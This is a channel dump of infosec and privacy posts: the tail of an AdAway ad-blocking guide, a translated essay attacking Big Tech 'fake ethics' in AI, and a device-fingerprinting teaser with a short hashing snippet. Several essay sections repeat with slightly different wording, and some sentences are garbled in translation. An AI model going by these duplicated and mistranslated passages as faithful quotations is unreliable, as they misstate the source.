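    return domain in BLOCKLIST

print(is_blocked("media.kuketz.de"))  # False - reachable again
print(is_blocked("ads.example.com"))  # True  - still filtered
```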
4.2 Whitelist of a domain | App
Via the menu item Your Lists you can view the domains you have added yourself. AdAway distinguishes between three different variants:
Negative list:
Here you can add your own domains for AdAway to block. In a way, this supplements the existing (block) lists with entries under your own control.
Positive list:
As already mentioned, the overblocking effect may occur under certain circumstances. If this happens, you can make a domain reachable again via the positive list. The positive list always takes precedence over the filter lists - the domain becomes reachable again even if it is listed in one of them.
Redirections:
If necessary, you can activate IP redirects for certain domains. The domain "facebook.com" could, for example, be pointed to the IP address 193.99.144.80 (heise.de). If you then call up "facebook.com" in your browser, you will land on heise.de.

5. Final note
The integration of advertising or the transmission of data to tracking companies is not necessary for an app's actual functionality. These third-party software components do not end up in an app by magic; they are deliberately integrated by the developers. Unfortunately, the developers themselves often do not know which data these building blocks or modules (known as SDKs in technical jargon) actually capture. Providers and developers thus frivolously sacrifice their users on the altar of a boundless data collection frenzy, regardless of the associated risks for their users' security and privacy.
With AdAway, you can minimize this unwanted data transfer. In practice, the principle of DNS blocking works extremely well - the vast majority of unwanted tracking and advertising domains are filtered, which of course has a positive effect on both security and privacy.
Nevertheless, you should not lull yourself into a false sense of security and believe that this solves all tracker and privacy problems. It may happen that a tracking or advertising domain is still so new or unknown that it has not yet found its way onto one of the (block) lists. In that case, there is a high probability that unwanted data will flow to questionable third parties. The best long-term protection against unwanted data leakage is to do without most of the apps offered in the Google Play Store. Fortunately, the F-Droid Store is an alternative app store aimed at critical users who value free and open-source applications. In the recommendation corner you will find privacy-friendly apps for a wide variety of purposes.
6. Conclusion
In the Google Play Store there is a whole arsenal of "pseudo-security apps" such as virus scanners, which lull the user into a false sense of security. AdAway, on the other hand, can effectively protect security and privacy. The paradox: AdAway is excluded from the Google Play Store because blocking trackers and advertising runs against Google's business model. An app that blocks the delivery of Google advertising and tracking is, understandably, a thorn in Google's side.
In the next article of the series "Take back control!" I will show you how to lock "Big Brother apps" from the Google Play Store into a kind of closed environment or prison - this is possible with Shelter. This way you can prevent these apps from accessing sensitive data (contacts etc.).
Source (🇩🇪) and more info:
https://www.kuketz-blog.de/adaway-werbe-und-trackingblocker-take-back-control-teil6/
#android #NoGoogle #guide #part1 #part2 #part4 #part5 #part6 #AdAway #kuketz
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
All just fake ethics
After numerous scandals, Facebook, Google and Co. have recently been playing the role of moral model students. Why we shouldn't fall for this scam.
Lean back, breathe calmly - in, out. There's no reason to get excited, you're in good hands. Even if the last time was difficult and you feel betrayed: We have listened, we promise improvement.
Everything will be different, no: Everything will be fine.
The promise
This is the sound of the hypnotic singsong currently blowing out of Silicon Valley.
For example, from Google headquarters, where ethicists are to discuss algorithms in the future, or from the mouth of Facebook boss Mark Zuckerberg. He suddenly wants the privacy of his users to take precedence over everything else and has recently expressed the wish for a "more active role for governments" in tech regulation. This follows a series of scandals that have severely damaged his company's reputation. The big IT companies no longer want to be the bad boys. Instead, they want to look more mature and virtuous. https://netzpolitik.org/2018/die-ultimative-liste-so-viele-datenskandale-gab-es-2018-bei-facebook/
Throughout the Valley, people are purifying themselves after the crisis tactics of recent years, mantra-like professing their own responsibility - code name: Corporate Digital Responsibility. Frightened by the risks and side effects of their own smart developments, the corporations seem to be reflecting on the good and proclaiming one set of ethics guidelines after another, especially in the field of artificial intelligence (AI).
Mark Zuckerberg recently even announced ideas for regulating the Internet in a charm offensive - after having lobbied for years against everything that looked like regulation (e.g. the GDPR). The CEO of Facebook not only promised obedience to the authorities in advance, but also posed as a moral advocate wishing to "preserve the good" on the Internet, presenting his own solutions from the very top with proposals for a "more active role for governments". https://www.washingtonpost.com/opinions/mark-zuckerberg-the-internet-needs-new-rules-lets-start-in-these-four-areas/2019/03/29/9e6f0504-521a-11e9-a3f7-78b7525a8d5f_story.html?noredirect=on&utm_term=.e2c285fa7e1e
Critics see Zuckerberg's proclamation as a clever power calculation to cement Facebook's monopoly position. They sense that someone here wants to take off his dirty coat in order to present himself as decent and clean-washed again. The discomfort is well-founded, and it does not just extend to Zuckerberg's newfound desire for clear rules.
The measures with which Google, Facebook and Co. want to get their problems in terms of credibility, data protection or artificial intelligence under control seem immature. They are fragmentary - and in most cases only a facade of public relations behind which the void yawns.
The problems
Google: Distorted Algorithms
For example at Google. There, in 2018, internal protests against Project Maven, an order from the US Department of Defense for the AI-supported, image-analytical improvement of drone attacks, were raised. CEO Sundar Pichai quickly announced new ethical guidelines: Google wanted to ensure that its AI systems would operate in a socially responsible manner, comply with scientific rigour, protect privacy, not discriminate unfairly, and generally be safe and responsible. https://www.blog.google/technology/ai/ai-principles/
But whether this catalogue of principles, formulated in the form of seven commandments, really promises a new responsibility in AI is highly questionable. As long as Google itself determines what an "appropriate transparency" and what a "relevant explanation" is, the effect of the new guidelines and the interpretation of the terms will remain a company secret - a beautiful appearance that at best simulates clear rules.
Google's commandments were not only a response to militarily explosive projects, but also a reaction to the case of Jacky Alciné, which became known in 2015: Google Photos had labelled Alciné and his girlfriend as "gorillas". This racist bias was traced back on the one hand to a patchy data set and on the other to a diversity problem among Google's programmers. Both are fundamental problems for many digital companies, as a study by the MIT Media Lab found. https://twitter.com/jackyalcine/status/615329515909156865?lang=en and http://proceedings.mlr.press/v81/buolamwini18a/buolamwini18a.pdf
The AI-supported face recognition software from IBM, Microsoft and Face++ also recognizes one group of people particularly well: white men. Black men, on the other hand, were wrongly classified in six percent of cases, black women in almost one third.
IBM: Questionable application areas
IBM, too, has therefore adopted ethical guidelines and even developed ethnically diverse data sets to correct distortions in its software. IBM CEO Virginia Rometty told the press that the company wanted to distinguish itself especially in the areas of trust and transparency: "Every organization that develops or uses AI or stores or processes the data must act responsibly and transparently."
However, the fact that IBM's face recognition software was used in Rodrigo Duterte's "War on Drugs" in the Philippines suggests that ethically responsible action is by no means guaranteed even with a distortion-free AI. Because the difficulties are not limited to the smooth functioning of the system, but are reflected above all in its questionable application. Can an ever more precise recording of the population - especially of marginalized groups - be desirable at all? Perhaps, as the authorities in San Francisco recently decided, it would be better to do without such technologies altogether.
The fact that Google, contrary to its announcement, has also resumed work on a search engine for the Chinese market is another reason to be suspicious of the companies' self-imposed catalogues of principles. They are not categorical imperatives but morally blurred declarations of intent whose commercial interpretation promises maximum flexibility. One must therefore almost inevitably agree with Rometty's words: "Society will decide which companies it trusts."
Microsoft: Ethics Council without bite
Microsoft has also been committed to the values of "transparency", "non-discrimination", "reliability", "accessibility", "responsibility" and "data protection" for a year now. So that such guidelines do not remain pretty but ultimately meaningless brochures, an ethics committee was established, the AI and Ethics in Engineering and Research (Aether) Committee, which advises developers on moral issues such as facial recognition and autonomous weapon systems. https://theintercept.com/2019/03/20/rodrigo-duterte-ibm-surveillance/
However, the committee is not allowed to provide information to the public. Hardly anything is known about the committee's working methods - what is known is limited to the statements of those responsible. These seldom shed light on the darkness. Eric Horvitz, director of the Microsoft Research Lab, recently proudly stated - albeit without giving any concrete figures - that the Aether Committee had already expressed reservations about the fact that several profits had not been realized. The committee had therefore shown its teeth. https://www.geekwire.com/2018/microsoft-cutting-off-sales-ai-ethics-top-researcher-eric-horvitz-says/
The AI-supported face recognition software from IBM, Microsoft and Face++ recognizes one group of people particularly well: white men. Black men, by contrast, were misclassified in six percent of cases, black women in almost a third.
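The disparity described here is, at bottom, a per-group error-rate measurement. A minimal sketch of how such rates are computed - the data below is hypothetical, mirroring the figures in the text, not the audit's actual dataset or code:

```python
# Illustrative sketch: measuring how often a classifier errs per demographic group.
from collections import defaultdict

def error_rates_by_group(records):
    """records: iterable of (group, true_label, predicted_label) tuples.
    Returns {group: fraction of misclassified samples}."""
    totals = defaultdict(int)
    errors = defaultdict(int)
    for group, truth, prediction in records:
        totals[group] += 1
        if truth != prediction:
            errors[group] += 1
    return {group: errors[group] / totals[group] for group in totals}

# Hypothetical audit data reflecting the disparity cited in the text:
sample = (
    [("white men", "m", "m")] * 99 + [("white men", "m", "f")] * 1 +
    [("black women", "f", "f")] * 67 + [("black women", "f", "m")] * 33
)
rates = error_rates_by_group(sample)
# rates["white men"] -> 0.01, rates["black women"] -> 0.33
```

An audit of this kind only requires the classifier's outputs on a labeled, demographically annotated test set; it needs no access to the model's internals.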
IBM: Questionable application areas
IBM, too, has therefore sought ethical guidelines and even developed ethnically diverse data sets to correct distortions in its software. IBM CEO Virginia Rometty told the press that the company wanted to remain attractive especially in the areas of trust and transparency: "Every organization that develops or uses AI or stores or processes the data must act responsibly and transparently."
However, the fact that IBM's face recognition software was used in Rodrigo Duterte's "War on Drugs" in the Philippines suggests that ethically responsible action is by no means guaranteed even with a bias-free AI. The difficulties are not limited to the smooth functioning of the system; they show above all in its questionable application. Can an ever more precise recording of the population - especially of marginalized groups - be desirable at all? Perhaps, as the authorities in San Francisco recently decided, it would be better to do without such technologies altogether. https://theintercept.com/2019/03/20/rodrigo-duterte-ibm-surveillance/
The fact that Google, contrary to its own announcement, has resumed work on a search engine for the Chinese market is another reason to be suspicious of the companies' self-written catalogues of principles. For these are framed not as categorical imperatives but as morally blurred declarations of intent whose commercial interpretation promises maximum flexibility. One must therefore almost inevitably agree with Rometty's words: "Society will decide which companies it trusts".
Microsoft: Ethics Council without bite
Microsoft, too, has been committed to the values of "transparency", "non-discrimination", "reliability", "accessibility", "responsibility" and "data protection" for a year now. So that such guidelines do not remain pretty but ultimately meaningless brochures, an ethics committee was established, the AI and Ethics in Engineering and Research (Aether) Committee, which advises developers on moral issues such as facial recognition and autonomous weapon systems.
However, the committee does not provide information to the public. Hardly anything is known about its working methods; what is known is limited to statements by those responsible, and these seldom shed light on the darkness. Eric Horvitz, director of the Microsoft Research Lab, recently stated with some pride - albeit without giving concrete figures - that reservations voiced by the Aether Committee had already led to several deals not being realized. The committee, in other words, had shown its teeth. https://www.geekwire.com/2018/microsoft-cutting-off-sales-ai-ethics-top-researcher-eric-horvitz-says/
Whether the committee really has an effect may be doubted, however. As the AI expert Rumman Chowdhury recently explained, the committee cannot enforce changes, only make recommendations. So it is not surprising that Microsoft has raised awareness on its own blog of the ethical problems of AI in military projects, yet despite employee protests still wants to cooperate with the US Department of Defense: "We can't address these new developments if the people in the tech sector who know the most about the technology withdraw from the debate." https://www.theverge.com/2019/4/3/18293410/ai-artificial-intelligence-ethics-boards-charters-problem-big-tech
Ethical ideals are thus documented in principle at Microsoft, but often appear only as rough outlines. As long as expert councils operate in secret and without the authority to issue directives, the "applied ethics" of the technology companies remains nothing but lip service.
Google: The wrong partners
Besides the deliberate lack of transparency, it is often the composition of the ethics councils that reveals their predetermined breaking points. Although their make-up usually follows the pretty principle of "interdisciplinarity", the members rarely impress with ethical qualifications.
Google recently learned that this is a problem. Starting in April, an eight-member Advanced Technology External Advisory Council was supposed to check whether the company's self-imposed values are actually put into practice in AI development. Even before its first meeting, the council was suspended again, because parts of the staff protested against its appointments and demanded the removal of both Dyan Gibbens, CEO of the drone manufacturer Trumbull, and Kay Coles James, president of the neoconservative think tank Heritage Foundation. https://blog.google/technology/ai/external-advisory-council-help-advance-responsible-development-ai/
Google now appears to be at a loss; without explaining anything in detail, the company merely wants to "break new ground" in obtaining external opinions.
Facebook: Purchased research
Facebook, meanwhile, shows how to sidestep the problem of lacking expertise and still appear untrustworthy. The social network also wants the ethical challenges of AI to be evaluated externally, and at the beginning of the year it founded the Institute for Ethics in Artificial Intelligence in cooperation with the Technical University of Munich. Facebook is investing 6.5 million euros over five years to develop "ethical guidelines for the responsible use of this technology in business and society". https://www.tum.de/die-tum/aktuelles/pressemitteilungen/detail/article/35188/
Since even a praiseworthy effort looks like ethical window dressing when it comes from a company whose CEO once called its users "dumb fucks", it was hardly surprising that criticism arose quickly. It was mostly aimed at the risk of bought research and the anticipated conflicts of interest, as well as the moral damage the university would suffer by "going to bed" with such a company. https://www.theguardian.com/technology/2018/apr/17/facebook-people-first-ever-mark-zuckerberg-harvard
Christoph Lütge, the institute's designated director, replied that it was independent of Facebook and that its research would be published transparently, pointing to the "win-win situation" for society as a whole resulting from Facebook's financing.
But there are limits to ethical research at the TU Munich as well. In an interview, Lütge stated that society's concerns about artificial intelligence would be addressed - but also that ethics "can do this better than legal regulation". https://netzpolitik.org/2019/warum-facebook-ein-institut-fuer-ethik-in-muenchen-finanziert/
Perhaps then the really important questions would finally come up: whether, how and at what speed we pursue the business of digitization at all, in which areas we want to use AI systems such as face recognition, and what regulation beyond platitudes of responsibility could look like. Where do our red lines run?
A critical public will therefore be more important than ever. In this spirit: breathe in and out calmly. But leaning back doesn't count - otherwise we end up as the all too trusting "dumb fucks" mentioned above.
https://www.republik.ch/2019/05/22/alles-nur-fake-ethik
#thinkabout #why
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
This is exactly where the matter becomes delicate. For as long as the companies themselves issue guidelines beyond generally applicable laws, "regulate themselves" through self-chosen councils or finance "independent" research, doubts will grow as to whether the ethical principles are really sufficient; whether they are upheld or enforced at all - or whether they are just a hollow shell and thus cheap PR.
EU: Trustworthy AI
So little of substance can be expected from the self-proclaimed do-gooders of Silicon Valley when it comes to ethics. From the staged appointment of Potemkin ethics councils to the ever-same, meaningless stock phrases, a great deal of verbal fuss is made. But there are usually no consequences that would genuinely call one's own actions into question.
Their educational work thus functions not as a "principle of responsibility" (Hans Jonas) but as an act of precautionary ethics washing. If something goes wrong again, one will at least be able to say: after all, we made an effort.
The EU has now recognised the problem and set up the 52-member High-Level Expert Group on Artificial Intelligence itself, an expert committee that was to develop guidelines for AI. https://ec.europa.eu/digital-single-market/en/high-level-expert-group-artificial-intelligence
The result was presented in April - and was sobering. Thomas Metzinger, Professor of Theoretical Philosophy and one of only four ethicists in the group, described it as "lukewarm, short-sighted and deliberately vague". Resolute rejections, such as the use of lethal autonomous weapon systems, had been dispensed with at the insistence of industry representatives and the proclaimed "trustworthy AI" was nothing more than a stale "marketing narrative". https://background.tagesspiegel.de/ethik-waschmaschinen-made-in-europe
Metzinger's conclusion:
If industry is too strongly involved in the discussion, at best "fake ethics" emerges - but no real ethical progress. His appeal: civil society must take the ethics debate back from industry in order to develop the guidelines further itself. But how?
The tasks
Lofty concepts alone have never made things or people better. And preaching morality, as Friedrich Nietzsche knew, is "just as easy as justifying morality is difficult". So instead of formulating a few melodious but shallow principles after the fact, it is necessary to start earlier.
This means raising ethical and socio-political questions already during developers' training - the TU Kaiserslautern, for example, offers a degree programme in Socioinformatics - and strengthening institutions that negotiate ethics and digitality at a higher level, beyond the usual lobbying. Institutions that push the discourse on effective rules without blinkers or false deference.
Humanities scholars are also needed here. Ethics - this would be the goal - must not remain a mere accessory that modestly accompanies or softly cushions the laissez-faire of the digital space. As a practice of consistent, critical assessment, its task should be to develop clear criteria for the corridors of action and thus also to determine the framework on which binding regulations are based. If it does not, it squanders its potential and risks becoming meaningless.
To avoid this, we should not rely on the voluntary self-regulation of the tech elite, but assert our independence and combine reflection on morality with reflection on how the world is being shaped. For if digital corporations penetrate ever more areas of life and decisively shape social coexistence through their smart systems, this should be taken seriously. And we should think fundamentally about whether the techies, entrepreneurs and engineers alone should decide on the ethical dimensions of their developments - or whether this should be a democratic, participatory, and thus many-voiced process.
Launch Ceremony for the Adoption of the OECD Recommendation on Artificial Intelligence
22 May 2019, OECD, Paris
http://www.oecd.org/about/secretary-general/launch-ceremony-for-adoption-of-oecd-recommendation-on-ai-paris-may-2019.htm
#OECD #ArtificialIntelligence
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
📺 SensorID
Sensor Calibration Fingerprinting for Smartphones
When you visit a website, your web browser provides a range of information to the website, including the name and version of your browser, screen size, fonts installed, and so on. Ostensibly, this information allows the website to provide a great user experience. Unfortunately this same information can also be used to track you. In particular, this information can be used to generate a distinctive signature, or device fingerprint, to identify you.
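The mechanism described above can be sketched in a few lines: combine the browser-reported attributes into a canonical string and hash it into a signature. The attribute names and values below are hypothetical examples of such data, not the SensorID method itself (which fingerprints sensor calibration data rather than browser information):

```python
# Illustrative sketch: combining browser-reported attributes into a
# stable "device fingerprint" signature, as described in the text.
import hashlib

def browser_fingerprint(attributes):
    """Hash a dict of browser-visible attributes into a short identifier."""
    canonical = "|".join(f"{key}={attributes[key]}" for key in sorted(attributes))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()[:16]

# Hypothetical values a website might receive from one visitor:
visitor = {
    "user_agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/66.0",
    "screen": "1920x1080",
    "timezone": "Europe/Berlin",
    "fonts": "Arial,DejaVu Sans,Noto",
}
signature = browser_fingerprint(visitor)  # same attributes -> same signature
```

Because the signature is deterministic, the same configuration yields the same identifier on every visit - which is exactly what makes such fingerprints usable for tracking without cookies.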
📺 https://sensorid.cl.cam.ac.uk/
#tracking #android #ios #fingerprinting
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN